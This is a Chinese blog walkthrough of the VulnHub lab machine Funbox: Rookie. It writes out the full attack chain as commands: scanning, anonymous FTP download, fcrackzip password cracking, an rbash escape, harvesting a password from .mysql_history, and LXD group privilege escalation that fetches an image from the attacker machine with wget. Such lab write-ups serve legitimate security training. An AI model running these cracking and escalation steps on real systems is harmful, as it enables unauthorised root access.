vulnhub Funbox: Rookie(funbox2)

最新推荐文章于 2024-05-02 20:46:40 发布
最新推荐文章于 2024-05-02 20:46:40 发布
阅读量3.9k 收藏 3
点赞数 1
分类专栏: vulnhub 文章标签: fcrackzip rbash sudo su lxd ftp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/123974142
版权

渗透思路:

nmap扫描 ---- ftp匿名访问并下载压缩包 ---- fcrackzip暴力破解zip密码 ---- ssh私钥登录并绕过rbash ---- sudo su提权/lxd group提权

环境信息:

靶机:192.168.3.115

攻击机:192.168.3.130

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.3.115

发现21(ftp,并且可以匿名登陆,而且有很多文件),22(ssh)和80(http)端口

2、dirb扫描(没啥用)

​dirb http://192.168.3.115

扫出了robots.txt

浏览器中访问一下http://192.168.3.115/robots.txt,发现/logs/目录

访问这个目录却404了

3、ftp匿名访问下载压缩包,并用fcrackzip暴力破解密码

浏览器访问ftp://192.168.3.115,把文件都下载下来

/usr/share/wordlists/rockyou.txt.gz拷贝到相同的目录下,并解压

用fcrackzip破解每个压缩包的密码,注意以下命令中-u参数表示使用unzip,使用这个参数可以排除掉误报的可能密码,本靶机如果不用这个参数,每个压缩包都会爆出一堆可能的密码

fcrackzip -D -p rockyou.txt -u xxx.zip

只能破解出cathrine.zip和tom.zip的密码分别为catwoman和iubire

解压之后是两个相同的私钥

diff命令对比一下,两个文件确实是完全一样的

4、ssh私钥登录并绕过rbash

tom用户ssh登录

ssh -i id_rsa tom@192.168.3.115

登录后发现是rbash,很多命令有限制

绕过rbash

ssh -i id_rsa tom@192.168.3.115 -t "bash --noprofile"

cathrine用户用私钥登录居然还需要密码,大概率系统上并无这个用户

tom用户shell下查看/etc/passwd,确认没有cathrine用户

5、发现tom的密码并sudo su提权

tom用户家目录下有个叫.mysql_history的文件,看上去有可能是mysql历史操作

查看.mysql_history的内容,发现其中有条语句看上去是往support表中写入tom的用户名和密码,tom登录shell的密码有可能也是support表中的xx11yy22!

c8ac7c89aff1e07d84bab3e4c5ca5cd9.png

sudo -l

并输入密码xx11yy22!,发现tom可以以所有用户的身份执行所有命令

输入以下命令提权

sudo su

6、lxd group提权

输入id命令,发现tom用户是lxd组的成员,可以利用这点进行提权

具体原理可见看我如何利用LXD实现权限提升 - FreeBuf网络安全行业门户

在攻击机上下载并完成alpine镜像构建

git clone  https://github.com/saghul/lxd-alpine-builder.git

cd lxd-alpine-builder

./build-alpine

得到最新alpine镜像alpine-v3.15-x86_64-20220405_1705.tar.gz

 攻击机上起http服务

python -m SimpleHTTPServer 80

靶机tom用户shell下转到/tmp文件夹下载alpine镜像

cd /tmp
wget http://192.168.3.130/alpine-v3.15-x86_64-20220405_1705.tar.gz

然后初始化lxd,初始化过程中Name of the storage backend to use选择dir,其他保持默认

lxd init

 将镜像导入lxd

lxc image import ./alpine-v3.15-x86_64-20220405_1705.tar.gz --alias hackerimage

然后执行如下命令,创建容器并将靶机根目录挂在在容器/mnt/root目录下,然后进入容器

lxc init hackerimage ignite -c security.privileged=true
lxc config device add ignite hackerdevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

进入容器后输入id命令,可以看到当前用户是root

进入/mnt/root目录可以看到整个靶机的根目录,在/mnt/root/root目录中找到flag

仙女象
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub-Funbox: RookieFunbox2)靶机渗透
m0_68117643的博客
07-07 1118
关于Funbox2这台靶机,运行在Vmware中无法获取靶机IP,尝试桥接、NAT、仅主机三种模式均无果,无奈转用VirtualBox,但NAT和桥接模式下也获取不到IP,仅在host-only模式下才可获取到靶机IP
vulnhub靶机实战--FunBox2:ROOKIE
m0_64312309的博客
09-21 410
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub-funbox-2-funxbox-rookie rookie wp
yutianovo的博客
09-14 429
靶机描述 Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first. This VM is created/tested with Virtualbox. Maybe it works with vmware. If you ne
vulnhub靶场之FunBox-2
最新发布
qq_58091216的博客
05-02 466
新建一个 MS02423文件夹把下载的压缩包文件都放进去发现里面都是加密的 id_rsa再把 /usr/share/wordlists/rockyou.txt字典 复制进去。我们可以看到报错了,那么这个办法是行不通的,我们换一个思路,我们查看ftp访问。我们可以看到成功绕过,我们查看home目录下的文件。我们看到好多的压缩包而且都是加密的,我们进行爆破。我们可以看到权限是root,我们直接查看flag。我们通过密码获取到tom的私钥,我们进行登录。我们知道tom的密码了,那么我们直接进行登录。
靶机渗透练习23-Funbox2-Rookie
hirak0的博客
04-18 1453
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-rookie,520/ Description Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first. This VM is cre
【每日打靶练习】vulnhub靶机平台--Funbox2(低)
leo788的博客
01-05 775
本靶机可熟悉ssh公钥登录,利用john工具进行密码破解,rbash逃逸并利用mysql服务提权。
funbox:测试和工具程序
02-11
滑稽
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
funbox_reactapp:测试
05-11
该项目是通过引导的。 您将在下面找到一些有关如何执行常见任务的信息。 您可以在找到本指南的最新版本。目录自动格式化代码更改页面<title>... 使用AJAX请求获取数据与API后端集成节点Ruby on Rails 在开发中...
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
中兴funbox固件b18版本
07-12
中兴funbox固件,b18,android 4.4
手机端软件TOM.zip
06-10
手机端
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5406
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
靶机实战(4):Funbox: Rookie
OneMoreThink
01-01 960
靶机官方:Funbox: Rookie[1]实战思路:一、主机发现二、端口发现(服务、组件、版本)三、漏洞发现(获取权限)21端口/FTP服务组件漏洞口令漏洞 422端口/SSH服务 9组件漏洞 9口令漏洞 10口令泄露 1080端口/HTTP服务 11组件漏洞 11URL漏洞(目录、文件) 12四、越权提权 15sudo 15suid 15信息收集 18sudo一、主机发现本次攻击指定IP,不涉...
实战打靶集锦-001-Funbox2
阿尔泰野狼的博客
01-20 1424
本文简要记录了博主打靶过程的心路历程
PG::FunboxRookie
aya3t的博客
11-28 215
PROVING GROUNDS::FunboxRookie
funbox2打靶思路分享
for_mat_的博客
03-30 137
funbox2打靶
Funbox2打靶过程及思路
qq_52610024的博客
06-30 827
ssh-iid_rsatom@192.168.182.135-t“bash--noprofile”但是失败。3.匿名可以登录ftp服务器,通过searchsploit搜素到版本存在proftp1.3.5的exp,但是。6.查看到.mysql_history下的tom账号密码,可以直接suroot拿到flag。7.或者sudo-s得到root权限,但是cd命令受限,是因为是rbash权限,尝试进行。5.john依次爆破所得的压缩包,通过tom压缩包解压得到的私钥成功登录服务器。...
FUNBOX: UNDER CONSTRUCTION!
08-16
- *2* [vulnhub--Funbox: Under Construction!](https://blog.csdn.net/qq_39991837/article/details/119374087)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值